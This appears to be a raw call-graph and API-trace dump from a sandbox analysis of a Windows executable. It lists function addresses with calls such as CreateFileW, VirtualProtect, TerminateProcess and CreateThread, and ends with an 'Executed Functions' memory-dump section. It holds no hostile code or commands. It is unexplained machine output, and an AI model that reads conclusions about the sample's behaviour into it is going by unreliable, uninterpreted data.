87674->87676 87675->87652 87676->87675 87678 4022e0 87677->87678 87679 40239d 87677->87679 87678->87679 87680 4115d7 52 API calls 87678->87680 87682 402320 ctype 87678->87682 87679->87652 87680->87682 87681 4115d7 52 API calls 87681->87682 87682->87679 87682->87681 87683->87636 87684->87635 87685->87652 87687 402417 87686->87687 87691 402539 ctype 87686->87691 87688 4115d7 52 API calls 87687->87688 87687->87691 87689 402443 87688->87689 87690 4115d7 52 API calls 87689->87690 87692 4024b4 87690->87692 87691->86749 87692->87691 87694 4022d0 52 API calls 87692->87694 87715 402880 95 API calls 2 library calls 87692->87715 87694->87692 87700 401566 87695->87700 87696 401794 87716 40e9a0 90 API calls 87696->87716 87699 4010a0 52 API calls 87699->87700 87700->87696 87700->87699 87702 40167a 87700->87702 87701 4017c0 87701->86751 87702->87701 87717 45e737 90 API calls 3 library calls 87702->87717 87704 40bc70 52 API calls 87703->87704 87705 40d451 87704->87705 87706 40d50f 87705->87706 87708 427c01 87705->87708 87709 40e0a0 52 API calls 87705->87709 87711 401b10 52 API calls 87705->87711 87712 40d519 87705->87712 87718 40f310 53 API calls 87705->87718 87719 40d860 91 API calls 87705->87719 87720 410600 52 API calls 87706->87720 87721 45e737 90 API calls 3 library calls 87708->87721 87709->87705 87711->87705 87712->86754 87715->87692 87716->87702 87717->87701 87718->87705 87719->87705 87720->87712 87721->87712 87722->86767 87723->86768 87725 42c5fe 87724->87725 87740 4091c6 87724->87740 87726 40bc70 52 API calls 87725->87726 87725->87740 87727 42c64e InterlockedIncrement 87726->87727 87728 42c665 87727->87728 87734 42c697 87727->87734 87730 42c672 InterlockedDecrement Sleep InterlockedIncrement 87728->87730 87728->87734 87729 42c737 InterlockedDecrement 87731 42c74a 87729->87731 87730->87728 87730->87734 87733 408f40 VariantClear 87731->87733 87732 42c731 87732->87729 87735 42c752 87733->87735 87734->87729 87734->87732 88008 408e80 87734->88008 88017 410c60 VariantClear ctype 87735->88017 87740->86828 87741 42c6db 87742 402160 52 API calls 87741->87742 87743 42c6e5 87742->87743 88013 45340c 85 API calls 87743->88013 87745 42c6f1 88014 40d200 52 API calls 2 library calls 87745->88014 87747 42c6fb 88015 465124 53 API calls 87747->88015 87749 42c715 87750 42c76a 87749->87750 87751 42c719 87749->87751 87752 401b10 52 API calls 87750->87752 88016 46fe32 VariantClear 87751->88016 87754 42c77e 87752->87754 87755 401980 53 API calls 87754->87755 87761 42c796 87755->87761 87756 42c812 88019 46fe32 VariantClear 87756->88019 87758 42c82a InterlockedDecrement 88020 46ff07 54 API calls 87758->88020 87760 42c864 88021 45e737 90 API calls 3 library calls 87760->88021 87761->87756 87761->87760 88018 40ba10 52 API calls 2 library calls 87761->88018 87762 42c9ec 88064 47d33e 331 API calls 87762->88064 87766 42c9fe 88065 46feb1 VariantClear VariantClear 87766->88065 87768 408f40 VariantClear 87774 42c849 87768->87774 87769 42ca08 87772 401b10 52 API calls 87769->87772 87770 42c874 87773 408f40 VariantClear 87770->87773 87781 42ca59 87770->87781 87771 402780 52 API calls 87771->87774 87775 42ca15 87772->87775 87776 42c891 87773->87776 87774->87762 87774->87768 87774->87771 87777 401980 53 API calls 87774->87777 88023 40a780 87774->88023 87778 40c2c0 52 API calls 87775->87778 88022 410c60 VariantClear ctype 87776->88022 87777->87774 87778->87770 87781->87781 87783 40afc4 87782->87783 87784 40b156 87782->87784 87785 40afd5 87783->87785 87786 42d1e3 87783->87786 88075 45e737 90 API calls 3 library calls 87784->88075 87790 40a780 194 API calls 87785->87790 87804 40b11a ctype 87785->87804 88076 45e737 90 API calls 3 library calls 87786->88076 87789 40b143 87789->86828 87793 40b00a 87790->87793 87791 42d1f8 87795 408f40 VariantClear 87791->87795 87793->87791 87796 40b012 87793->87796 87794 42d4db 87794->87794 87795->87789 87797 40b04a 87796->87797 87798 40b094 ctype 87796->87798 87799 42d231 VariantClear 87796->87799 87802 40b05c ctype 87797->87802 88077 40e270 VariantClear ctype 87797->88077 87800 40b108 87798->87800 87801 42d425 ctype 87798->87801 87799->87802 87800->87804 88078 40e270 VariantClear ctype 87800->88078 87803 42d45a VariantClear 87801->87803 87801->87804 87802->87798 87807 4115d7 52 API calls 87802->87807 87803->87804 87804->87789 88079 45e737 90 API calls 3 library calls 87804->88079 87807->87798 87809 408fff 87808->87809 87822 40900d 87808->87822 88080 403ea0 52 API calls __cinit 87809->88080 87812 42c3f6 88083 45e737 90 API calls 3 library calls 87812->88083 87814 40a780 194 API calls 87814->87822 87815 42c44a 88085 45e737 90 API calls 3 library calls 87815->88085 87817 42c47b 88086 451b42 61 API calls 87817->88086 87819 42c4cb 88088 47faae 233 API calls 87819->88088 87820 42c564 87825 408f40 VariantClear 87820->87825 87822->87812 87822->87814 87822->87815 87822->87817 87822->87819 87822->87820 87824 42c548 87822->87824 87828 409112 87822->87828 87829 42c528 87822->87829 87831 4090df 87822->87831 87836 4090ea 87822->87836 87840 4090f2 ctype 87822->87840 88082 4534e3 52 API calls 87822->88082 88084 40c4e0 194 API calls 87822->88084 88091 45e737 90 API calls 3 library calls 87824->88091 87825->87840 87826 42c491 87826->87840 88087 45e737 90 API calls 3 library calls 87826->88087 87827 42c4da 87827->87840 88089 45e737 90 API calls 3 library calls 87827->88089 87828->87824 87834 40912b 87828->87834 88090 45e737 90 API calls 3 library calls 87829->88090 87831->87836 87837 408e80 VariantClear 87831->87837 87834->87840 88081 403e10 53 API calls 87834->88081 87838 408f40 VariantClear 87836->87838 87837->87836 87838->87840 87840->86828 87841 40914b 87842 408f40 VariantClear 87841->87842 87842->87840 88092 408d90 87843->88092 87845 429778 88120 410c60 VariantClear ctype 87845->88120 87847 429780 87848 408cf9 87848->87845 87849 42976c 87848->87849 87851 408d2d 87848->87851 88119 45e737 90 API calls 3 library calls 87849->88119 88108 403d10 87851->88108 87854 408d71 ctype 87854->86828 87855 408d45 ctype 87855->87854 87856 408f40 VariantClear 87855->87856 87856->87855 87858 4096c6 _wcslen 87857->87858 87859 40a70c ctype _memmove 87858->87859 87860 4115d7 52 API calls 87858->87860 87862 4013a0 52 API calls 87859->87862 87861 4096fa _memmove 87860->87861 87863 4115d7 52 API calls 87861->87863 87864 4297aa 87862->87864 87865 40971b 87863->87865 87866 4115d7 52 API calls 87864->87866 87865->87859 87867 409749 CharUpperBuffW 87865->87867 87869 40976a ctype 87865->87869 87910 4297d1 _memmove 87866->87910 87867->87869 87919 4097e5 ctype 87869->87919 88395 47dcbb 196 API calls 87869->88395 87871 42a452 87872 408f40 VariantClear 87871->87872 87873 42ae92 87872->87873 88422 410c60 VariantClear ctype 87873->88422 87875 42aea4 87876 409aa2 87878 4115d7 52 API calls 87876->87878 87883 409afe 87876->87883 87876->87910 87877 40a689 87880 4115d7 52 API calls 87877->87880 87878->87883 87879 4115d7 52 API calls 87879->87919 87897 40a6af ctype _memmove 87880->87897 87881 40c2c0 52 API calls 87881->87919 87882 409b2a 87886 429dbe 87882->87886 87945 409b4d ctype _memmove 87882->87945 88403 40b400 VariantClear VariantClear ctype 87882->88403 87883->87882 87884 4115d7 52 API calls 87883->87884 87885 429d31 87884->87885 87888 429d42 87885->87888 88400 44a801 52 API calls 87885->88400 87890 429dd3 87886->87890 88404 40b400 VariantClear VariantClear ctype 87886->88404 87887 409fd2 87895 40a045 87887->87895 87944 42a3f5 87887->87944 87901 40e0a0 52 API calls 87888->87901 87890->87945 88405 40e1c0 VariantClear ctype 87890->88405 87891 429a46 VariantClear 87891->87919 87892 408f40 VariantClear 87892->87919 87899 4115d7 52 API calls 87895->87899 87905 4115d7 52 API calls 87897->87905 87906 40a04c 87899->87906 87907 429d57 87901->87907 87903 42a42f 88409 45e737 90 API calls 3 library calls 87903->88409 87905->87859 87908 40a0a7 87906->87908 87912 4091e0 317 API calls 87906->87912 88401 453443 52 API calls 87907->88401 87928 40a0af 87908->87928 88410 40c790 VariantClear ctype 87908->88410 87909 4299d9 87913 408f40 VariantClear 87909->87913 88421 45e737 90 API calls 3 library calls 87910->88421 87912->87908 87918 4299e2 87913->87918 87914 429abd 87914->86828 87915 429d88 88402 453443 52 API calls 87915->88402 88397 410c60 VariantClear ctype 87918->88397 87919->87871 87919->87876 87919->87877 87919->87879 87919->87881 87919->87891 87919->87892 87919->87897 87919->87909 87919->87910 87919->87914 87923 40a780 194 API calls 87919->87923 88396 40c4e0 194 API calls 87919->88396 88398 40ba10 52 API calls 2 library calls 87919->88398 88399 40e270 VariantClear ctype 87919->88399 87923->87919 87924 402780 52 API calls 87924->87945 87926 408f40 VariantClear 87958 40a162 ctype _memmove 87926->87958 87927 41130a 51 API calls __cinit 87927->87945 87929 40a11b 87928->87929 87931 42a4b4 VariantClear 87928->87931 87928->87958 87936 40a12d ctype 87929->87936 88411 40e270 VariantClear ctype 87929->88411 87930 40a780 194 API calls 87930->87945 87931->87936 87933 401980 53 API calls 87933->87945 87934 408e80 VariantClear 87934->87945 87935 4115d7 52 API calls 87935->87958 87936->87935 87936->87958 87937 408e80 VariantClear 87937->87958 87939 44a801 52 API calls 87939->87945 87940 42a74d VariantClear 87940->87958 87941 4115d7 52 API calls 87941->87945 87942 40a368 87943 42aad4 87942->87943 87952 40a397 87942->87952 88414 46fe90 VariantClear VariantClear ctype 87943->88414 88408 47390f VariantClear 87944->88408 87945->87859 87945->87887 87945->87903 87945->87924 87945->87927 87945->87930 87945->87933 87945->87934 87945->87939 87945->87941 87945->87944 87948 409c95 87945->87948 88406 45f508 52 API calls 87945->88406 88407 403e10 53 API calls 87945->88407 87946 42a886 VariantClear 87946->87958 87947 42a7e4 VariantClear 87947->87958 87948->86828 87949 40a3ce 87962 40a3d9 ctype 87949->87962 88415 40b400 VariantClear VariantClear ctype 87949->88415 87951 40e270 VariantClear 87951->87958 87952->87949 87975 40a42c ctype 87952->87975 88394 40b400 VariantClear VariantClear ctype 87952->88394 87955 4115d7 52 API calls 87955->87958 87956 42abaf 87960 42abd4 VariantClear 87956->87960 87969 40a4ee ctype 87956->87969 87957 4115d7 52 API calls 87961 42a5a6 VariantInit VariantCopy 87957->87961 87958->87926 87958->87937 87958->87940 87958->87942 87958->87943 87958->87946 87958->87947 87958->87951 87958->87955 87958->87957 88412 470870 52 API calls 87958->88412 88413 44ccf1 VariantClear ctype 87958->88413 87959 40a4dc 87959->87969 88417 40e270 VariantClear ctype 87959->88417 87960->87969 87961->87958 87964 42a5c6 VariantClear 87961->87964 87963 40a41a 87962->87963 87967 42ab44 VariantClear 87962->87967 87962->87975 87963->87975 88416 40e270 VariantClear ctype 87963->88416 87964->87958 87965 42ac4f 87971 42ac79 VariantClear 87965->87971 87977 40a546 ctype 87965->87977 87967->87975 87969->87965 87970 40a534 87969->87970 87970->87977 88418 40e270 VariantClear ctype 87970->88418 87971->87977 87972 42ad28 87978 42ad4e VariantClear 87972->87978 87983 40a583 ctype 87972->87983 87974 40a571 87974->87983 88419 40e270 VariantClear ctype 87974->88419 87975->87956 87975->87959 87977->87972 87977->87974 87978->87983 87980 40a650 ctype 87980->86828 87981 42ae0e VariantClear 87981->87983 87983->87980 87983->87981 88420 40e270 VariantClear ctype 87983->88420 87984->86828 87985->86828 87986->86828 87987->86778 87988->86783 87989->86828 87990->86828 87991->86828 87992->86828 87993->86835 87994->86835 87995->86835 87996->86835 87997->86835 87998->86835 87999->86835 88001 403cdf 88000->88001 88002 408f40 VariantClear 88001->88002 88003 403ce7 88002->88003 88003->86821 88004->86835 88005->86835 88006->86828 88007->86775 88009 408e94 88008->88009 88010 408e88 88008->88010 88012 45340c 85 API calls 88009->88012 88011 408f40 VariantClear 88010->88011 88011->88009 88012->87741 88013->87745 88014->87747 88015->87749 88016->87732 88017->87740 88018->87761 88019->87758 88020->87774 88021->87770 88022->87740 88024 40a7a6 88023->88024 88025 40ae8c 88023->88025 88027 4115d7 52 API calls 88024->88027 88066 41130a 51 API calls __cinit 88025->88066 88062 40a7c6 ctype _memmove 88027->88062 88028 40a86d 88029 40abd1 88028->88029 88048 40a878 ctype 88028->88048 88071 45e737 90 API calls 3 library calls 88029->88071 88030 4115d7 52 API calls 88030->88062 88031 408e80 VariantClear 88031->88062 88032 401b10 52 API calls 88032->88062 88034 40b5f0 89 API calls 88034->88062 88035 42b791 VariantClear 88035->88062 88036 40bc10 53 API calls 88036->88062 88037 42ba2d VariantClear 88037->88062 88038 408f40 VariantClear 88038->88048 88039 40a884 ctype 88039->87774 88040 42b459 VariantClear 88040->88062 88041 42b6f6 VariantClear 88041->88062 88043 408cc0 187 API calls 88043->88062 88044 40e270 VariantClear 88044->88062 88045 42bc5b 88045->87774 88046 4530c9 VariantClear 88046->88062 88047 42bb6a 88074 44b92d VariantClear 88047->88074 88048->88038 88048->88039 88049 42bbf5 88072 45e737 90 API calls 3 library calls 88049->88072 88051 4115d7 52 API calls 88053 42b5b3 VariantInit VariantCopy 88051->88053 88052 408f40 VariantClear 88052->88062 88056 42b5d7 VariantClear 88053->88056 88053->88062 88056->88062 88058 42bc37 88073 45e737 90 API calls 3 library calls 88058->88073 88061 42bc48 88061->88047 88063 408f40 VariantClear 88061->88063 88062->88028 88062->88029 88062->88030 88062->88031 88062->88032 88062->88034 88062->88035 88062->88036 88062->88037 88062->88040 88062->88041 88062->88043 88062->88044 88062->88046 88062->88047 88062->88049 88062->88051 88062->88052 88062->88058 88067 45308a 53 API calls 88062->88067 88068 470870 52 API calls 88062->88068 88069 457f66 87 API calls __write_nolock 88062->88069 88070 472f47 127 API calls 88062->88070 88063->88047 88064->87766 88065->87769 88066->88062 88067->88062 88068->88062 88069->88062 88070->88062 88071->88047 88072->88047 88073->88061 88074->88045 88075->87786 88076->87791 88077->87802 88078->87804 88079->87794 88080->87822 88081->87841 88082->87822 88083->87840 88084->87822 88085->87840 88086->87826 88087->87840 88088->87827 88089->87840 88090->87840 88091->87820 88093 4289d2 88092->88093 88094 408db3 88092->88094 88123 45e737 90 API calls 3 library calls 88093->88123 88121 40bec0 90 API calls 88094->88121 88097 4289e5 88124 45e737 90 API calls 3 library calls 88097->88124 88098 408e5a 88098->87848 88101 428a05 88102 408f40 VariantClear 88101->88102 88102->88098 88103 40a780 194 API calls 88104 408dc9 88103->88104 88104->88097 88104->88098 88104->88101 88104->88103 88105 408e64 88104->88105 88107 408f40 VariantClear 88104->88107 88122 40ba10 52 API calls 2 library calls 88104->88122 88106 408f40 VariantClear 88105->88106 88106->88098 88107->88104 88109 408f40 VariantClear 88108->88109 88110 403d20 88109->88110 88111 403cd0 VariantClear 88110->88111 88112 403d4d 88111->88112 88114 4013c0 52 API calls 88112->88114 88125 4755ad 88112->88125 88128 46e91c 88112->88128 88131 45e17d 88112->88131 88141 467897 88112->88141 88113 403d76 88113->87845 88113->87855 88114->88113 88119->87845 88120->87847 88121->88104 88122->88104 88123->88097 88124->88101 88185 475077 88125->88185 88127 4755c0 88127->88113 88291 46e785 88128->88291 88130 46e92f 88130->88113 88132 45e198 88131->88132 88133 45e19c 88132->88133 88134 45e1b8 88132->88134 88137 408f40 VariantClear 88133->88137 88135 45e1cc 88134->88135 88136 45e1db FindClose 88134->88136 88138 45e1d9 ctype 88135->88138 88140 44ae3e CloseHandle 88135->88140 88136->88138 88139 45e1a4 88137->88139 88138->88113 88139->88113 88140->88138 88142 4678bb 88141->88142 88143 467954 88142->88143 88388 45340c 85 API calls 88142->88388 88144 4115d7 52 API calls 88143->88144 88175 467964 88143->88175 88145 467989 88144->88145 88147 467995 88145->88147 88392 40da60 53 API calls 88145->88392 88151 4533eb 85 API calls 88147->88151 88148 4678f6 88150 413a0e __wsplitpath 46 API calls 88148->88150 88152 4678fc 88150->88152 88153 4679b7 88151->88153 88154 401b10 52 API calls 88152->88154 88156 40de40 60 API calls 88153->88156 88155 46790c 88154->88155 88389 40d200 52 API calls 2 library calls 88155->88389 88157 4679c3 88156->88157 88159 4679c7 GetLastError 88157->88159 88160 467a05 88157->88160 88162 403cd0 VariantClear 88159->88162 88165 467a2c 88160->88165 88166 467a4b 88160->88166 88161 467917 88161->88143 88390 4339fa GetFileAttributesW FindFirstFileW FindClose 88161->88390 88163 4679dc 88162->88163 88167 4679e6 88163->88167 88172 44ae3e CloseHandle 88163->88172 88170 4115d7 52 API calls 88165->88170 88168 4115d7 52 API calls 88166->88168 88174 408f40 VariantClear 88167->88174 88177 467a49 88168->88177 88169 467928 88169->88143 88173 46792f 88169->88173 88171 467a31 88170->88171 88393 436299 52 API calls 2 library calls 88171->88393 88172->88167 88391 4335cd 56 API calls 3 library calls 88173->88391 88179 4679ed 88174->88179 88175->88113 88180 408f40 VariantClear 88177->88180 88179->88113 88182 467a88 88180->88182 88181 467939 88181->88143 88183 408f40 VariantClear 88181->88183 88182->88113 88184 467947 88183->88184 88184->88143 88238 4533eb 88185->88238 88188 4750ee 88191 408f40 VariantClear 88188->88191 88189 475129 88242 4646e0 88189->88242 88196 4750f5 88191->88196 88192 47515e 88193 475162 88192->88193 88220 47518e 88192->88220 88194 408f40 VariantClear 88193->88194 88214 475169 88194->88214 88195 475357 88197 475365 88195->88197 88198 4754ea 88195->88198 88196->88127 88276 44b3ac 57 API calls 88197->88276 88282 464812 92 API calls 88198->88282 88202 4754fc 88203 475374 88202->88203 88204 475508 88202->88204 88255 430d31 88203->88255 88206 408f40 VariantClear 88204->88206 88205 4533eb 85 API calls 88205->88220 88209 47550f 88206->88209 88209->88214 88210 475388 88262 4577e9 88210->88262 88212 47539e 88270 410cfc 88212->88270 88213 475480 88216 408f40 VariantClear 88213->88216 88214->88127 88216->88214 88218 4753d4 88278 40e830 53 API calls 88218->88278 88219 4753b8 88277 45e737 90 API calls 3 library calls 88219->88277 88220->88195 88220->88205 88220->88213 88224 4754b5 88220->88224 88274 436299 52 API calls 2 library calls 88220->88274 88275 463ad5 64 API calls __wcsicoll 88220->88275 88223 4753c5 GetCurrentProcess TerminateProcess 88223->88218 88225 408f40 VariantClear 88224->88225 88225->88214 88226 4753e3 88236 475406 88226->88236 88279 40cf00 53 API calls 88226->88279 88228 475556 88228->88214 88229 4753f8 88234 408e80 VariantClear 88234->88236 88236->88228 88236->88234 88237 408f40 VariantClear 88236->88237 88281 40cf00 53 API calls 88236->88281 88237->88236 88239 453404 88238->88239 88240 4533f8 88238->88240 88239->88188 88239->88189 88240->88239 88285 4531b1 85 API calls 5 library calls 88240->88285 88286 4536f7 53 API calls 88242->88286 88244 4646fc 88287 4426cd 59 API calls _wcslen 88244->88287 88246 464711 88248 40bc70 52 API calls 88246->88248 88254 46474b 88246->88254 88249 46472c 88248->88249 88288 461465 52 API calls _memmove 88249->88288 88251 464741 88252 40c600 52 API calls 88251->88252 88252->88254 88253 464793 88253->88192 88254->88253 88289 463ad5 64 API calls __wcsicoll 88254->88289 88256 430db2 88255->88256 88257 430d54 88255->88257 88256->88210 88258 4115d7 52 API calls 88257->88258 88261 430d74 88258->88261 88259 430da9 88259->88210 88260 4115d7 52 API calls 88260->88261 88261->88259 88261->88260 88263 457a84 88262->88263 88269 45780c _strcat _wcslen _wcscpy ctype 88262->88269 88263->88212 88264 443006 57 API calls 88264->88269 88266 4135bb 46 API calls _malloc 88266->88269 88267 45340c 85 API calls 88267->88269 88268 40f6f0 54 API calls 88268->88269 88269->88263 88269->88264 88269->88266 88269->88267 88269->88268 88290 44b3ac 57 API calls 88269->88290 88272 410d11 88270->88272 88271 410da9 VirtualProtect 88273 410d77 88271->88273 88272->88271 88272->88273 88273->88218 88273->88219 88274->88220 88275->88220 88276->88203 88277->88223 88278->88226 88279->88229 88281->88236 88282->88202 88285->88239 88286->88244 88287->88246 88288->88251 88289->88253 88290->88269 88292 46e7a2 88291->88292 88293 4115d7 52 API calls 88292->88293 88296 46e802 88292->88296 88294 46e7ad 88293->88294 88295 46e7b9 88294->88295 88339 40da60 53 API calls 88294->88339 88301 4533eb 85 API calls 88295->88301 88297 46e7e5 88296->88297 88305 46e82f 88296->88305 88298 408f40 VariantClear 88297->88298 88300 46e7ea 88298->88300 88300->88130 88302 46e7ca 88301->88302 88340 40de40 88302->88340 88304 46e8b5 88332 4680ed 88304->88332 88305->88304 88306 46e845 88305->88306 88309 4533eb 85 API calls 88306->88309 88317 46e84b 88309->88317 88310 46e7db 88310->88297 88352 44ae3e 88310->88352 88311 46e8bb 88336 443fbe 88311->88336 88312 46e87a 88355 4689f4 59 API calls 88312->88355 88314 46e883 88318 4013c0 52 API calls 88314->88318 88317->88312 88317->88314 88320 46e88f 88318->88320 88321 40e0a0 52 API calls 88320->88321 88323 46e899 88321->88323 88322 408f40 VariantClear 88330 46e881 88322->88330 88356 40d200 52 API calls 2 library calls 88323->88356 88325 46e911 88325->88130 88326 46e8a5 88357 4689f4 59 API calls 88326->88357 88329 46e903 88331 44ae3e CloseHandle 88329->88331 88330->88325 88358 40da20 88330->88358 88331->88325 88333 4680fa 88332->88333 88335 468100 88332->88335 88362 467ac4 55 API calls 2 library calls 88333->88362 88335->88311 88363 443e36 88336->88363 88338 443fd3 88338->88322 88338->88330 88339->88295 88341 40da20 CloseHandle 88340->88341 88342 40de4e 88341->88342 88370 40f110 88342->88370 88345 4264fa 88347 40de84 88379 40e080 SetFilePointerEx SetFilePointerEx 88347->88379 88349 40de8b 88380 40f160 SetFilePointerEx SetFilePointerEx WriteFile 88349->88380 88351 40de90 88351->88305 88351->88310 88353 44ae4b ctype 88352->88353 88382 443fdf 88352->88382 88353->88297 88355->88330 88356->88326 88357->88330 88359 40da37 88358->88359 88360 40da29 88358->88360 88359->88360 88361 40da3c CloseHandle 88359->88361 88360->88329 88361->88329 88362->88335 88366 443e19 88363->88366 88367 443e26 88366->88367 88368 443e32 WriteFile 88366->88368 88369 443db4 SetFilePointerEx SetFilePointerEx 88367->88369 88368->88338 88369->88368 88371 40f125 CreateFileW 88370->88371 88372 42630c 88370->88372 88374 40de74 88371->88374 88373 426311 CreateFileW 88372->88373 88372->88374 88373->88374 88375 426337 88373->88375 88374->88345 88378 40dea0 55 API calls ctype 88374->88378 88381 40df90 SetFilePointerEx SetFilePointerEx 88375->88381 88377 426342 88377->88374 88378->88347 88379->88349 88380->88351 88381->88377 88383 40da20 CloseHandle 88382->88383 88384 443feb 88383->88384 88387 4340db CloseHandle ctype 88384->88387 88386 444001 88386->88353 88387->88386 88388->88148 88389->88161 88390->88169 88391->88181 88392->88147 88393->88177 88394->87949 88395->87869 88396->87919 88397->87980 88398->87919 88399->87919 88400->87888 88401->87915 88402->87882 88403->87886 88404->87890 88405->87945 88406->87945 88407->87945 88408->87903 88409->87871 88410->87908 88411->87936 88412->87958 88413->87958 88414->87949 88415->87962 88416->87975 88417->87969 88418->87977 88419->87983 88420->87983 88421->87871 88422->87875 88423 426c400 88437 426a050 88423->88437 88425 426c4bb 88440 426c2f0 88425->88440 88443 426d500 GetPEB 88437->88443 88439 426a6db 88439->88425 88441 426c2f9 Sleep 88440->88441 88442 426c307 88441->88442 88444 426d52a 88443->88444 88444->88439 88445 42d154 88449 480a8d 88445->88449 88447 42d161 88448 480a8d 194 API calls 88447->88448 88448->88447 88450 480ae4 88449->88450 88451 480b26 88449->88451 88453 480aeb 88450->88453 88454 480b15 88450->88454 88452 40bc70 52 API calls 88451->88452 88472 480b2e 88452->88472 88455 480aee 88453->88455 88456 480b04 88453->88456 88482 4805bf 194 API calls 88454->88482 88455->88451 88458 480af3 88455->88458 88481 47fea2 194 API calls __itow_s 88456->88481 88480 47f135 194 API calls 88458->88480 88461 40e0a0 52 API calls 88461->88472 88463 408f40 VariantClear 88465 481156 88463->88465 88464 480aff 88464->88463 88466 408f40 VariantClear 88465->88466 88467 48115e 88466->88467 88467->88447 88468 40e710 53 API calls 88468->88472 88469 401980 53 API calls 88469->88472 88471 40c2c0 52 API calls 88471->88472 88472->88461 88472->88464 88472->88468 88472->88469 88472->88471 88473 40a780 194 API calls 88472->88473 88475 408e80 VariantClear 88472->88475 88476 480ff5 88472->88476 88483 45377f 52 API calls 88472->88483 88484 45e951 53 API calls 88472->88484 88485 40e830 53 API calls 88472->88485 88486 47925f 53 API calls 88472->88486 88487 47fcff 194 API calls 88472->88487 88473->88472 88475->88472 88488 45e737 90 API calls 3 library calls 88476->88488 88480->88464 88481->88464 88482->88464 88483->88472 88484->88472 88485->88472 88486->88472 88487->88472 88488->88464 88489 42b14b 88496 40bc10 88489->88496 88491 42b159 88492 4096a0 331 API calls 88491->88492 88493 42b177 88492->88493 88507 44b92d VariantClear 88493->88507 88495 42bc5b 88497 40bc24 88496->88497 88498 40bc17 88496->88498 88500 40bc2a 88497->88500 88501 40bc3c 88497->88501 88499 408e80 VariantClear 88498->88499 88502 40bc1f 88499->88502 88503 408e80 VariantClear 88500->88503 88504 4115d7 52 API calls 88501->88504 88502->88491 88505 40bc33 88503->88505 88506 40bc43 88504->88506 88505->88491 88506->88491 88507->88495 88508 425b2b 88513 40f000 88508->88513 88512 425b3a 88514 4115d7 52 API calls 88513->88514 88515 40f007 88514->88515 88516 4276ea 88515->88516 88522 40f030 88515->88522 88521 41130a 51 API calls __cinit 88521->88512 88523 40f039 88522->88523 88524 40f01a 88522->88524 88552 41130a 51 API calls __cinit 88523->88552 88526 40e500 88524->88526 88527 40bc70 52 API calls 88526->88527 88528 40e515 GetVersionExW 88527->88528 88529 402160 52 API calls 88528->88529 88530 40e557 88529->88530 88553 40e660 88530->88553 88536 427674 88540 4276c6 GetSystemInfo 88536->88540 88538 40e5e0 88542 4276d5 GetSystemInfo 88538->88542 88567 40efd0 88538->88567 88539 40e5cd GetCurrentProcess 88574 40ef20 LoadLibraryA GetProcAddress 88539->88574 88540->88542 88545 40e629 88571 40ef90 88545->88571 88548 40e641 FreeLibrary 88549 40e644 88548->88549 88550 40e653 FreeLibrary 88549->88550 88551 40e656 88549->88551 88550->88551 88551->88521 88552->88524 88554 40e667 88553->88554 88555 42761d 88554->88555 88556 40c600 52 API calls 88554->88556 88557 40e55c 88556->88557 88558 40e680 88557->88558 88559 40e687 88558->88559 88560 427616 88559->88560 88561 40c600 52 API calls 88559->88561 88562 40e566 88561->88562 88562->88536 88563 40ef60 88562->88563 88564 40e5c8 88563->88564 88565 40ef66 LoadLibraryA 88563->88565 88564->88538 88564->88539 88565->88564 88566 40ef77 GetProcAddress 88565->88566 88566->88564 88568 40e620 88567->88568 88569 40efd6 LoadLibraryA 88567->88569 88568->88540 88568->88545 88569->88568 88570 40efe7 GetProcAddress 88569->88570 88570->88568 88575 40efb0 LoadLibraryA GetProcAddress 88571->88575 88573 40e632 GetNativeSystemInfo 88573->88548 88573->88549 88574->88538 88575->88573 88576 425b5e 88581 40c7f0 88576->88581 88580 425b6d 88616 40db10 52 API calls 88581->88616 88583 40c82a 88617 410ab0 6 API calls 88583->88617 88585 40c86d 88586 40bc70 52 API calls 88585->88586 88587 40c877 88586->88587 88588 40bc70 52 API calls 88587->88588 88589 40c881 88588->88589 88590 40bc70 52 API calls 88589->88590 88591 40c88b 88590->88591 88592 40bc70 52 API calls 88591->88592 88593 40c8d1 88592->88593 88594 40bc70 52 API calls 88593->88594 88595 40c991 88594->88595 88618 40d2c0 52 API calls 88595->88618 88597 40c99b 88619 40d0d0 53 API calls 88597->88619 88599 40c9c1 88600 40bc70 52 API calls 88599->88600 88601 40c9cb 88600->88601 88620 40e310 53 API calls 88601->88620 88603 40ca28 88604 408f40 VariantClear 88603->88604 88605 40ca30 88604->88605 88606 408f40 VariantClear 88605->88606 88607 40ca38 GetStdHandle 88606->88607 88608 429630 88607->88608 88609 40ca87 88607->88609 88608->88609 88610 429639 88608->88610 88615 41130a 51 API calls __cinit 88609->88615 88621 4432c0 57 API calls 88610->88621 88612 429641 88622 44b6ab CreateThread 88612->88622 88614 42964f CloseHandle 88614->88609 88615->88580 88616->88583 88617->88585 88618->88597 88619->88599 88620->88603 88621->88612 88622->88614 88623 44b5cb 58 API calls 88622->88623 88624 425b6f 88629 40dc90 88624->88629 88628 425b7e 88630 40bc70 52 API calls 88629->88630 88631 40dd03 88630->88631 88638 40f210 88631->88638 88633 426a97 88635 40dd96 88635->88633 88636 40ddb7 88635->88636 88641 40dc00 52 API calls 2 library calls 88635->88641 88637 41130a 51 API calls __cinit 88636->88637 88637->88628 88642 40f250 RegOpenKeyExW 88638->88642 88640 40f230 88640->88635 88641->88635 88643 425e17 88642->88643 88644 40f275 RegQueryValueExW 88642->88644 88643->88640 88645 40f2c3 RegCloseKey 88644->88645 88646 40f298 88644->88646 88645->88640 88647 40f2a9 RegCloseKey 88646->88647 88648 425e1d 88646->88648 88647->88640

                                                    Executed Functions

                                                    Function 004096A0 Relevance: 33.9, APIs: 21, Instructions: 2413COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 004096C1
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 0040970C
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00000000), ref: 00409753
                                                    • _memmove.LIBCMT ref: 00409D96
                                                    • _memmove.LIBCMT ref: 0040A6C4
                                                    • _memmove.LIBCMT ref: 004297E5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
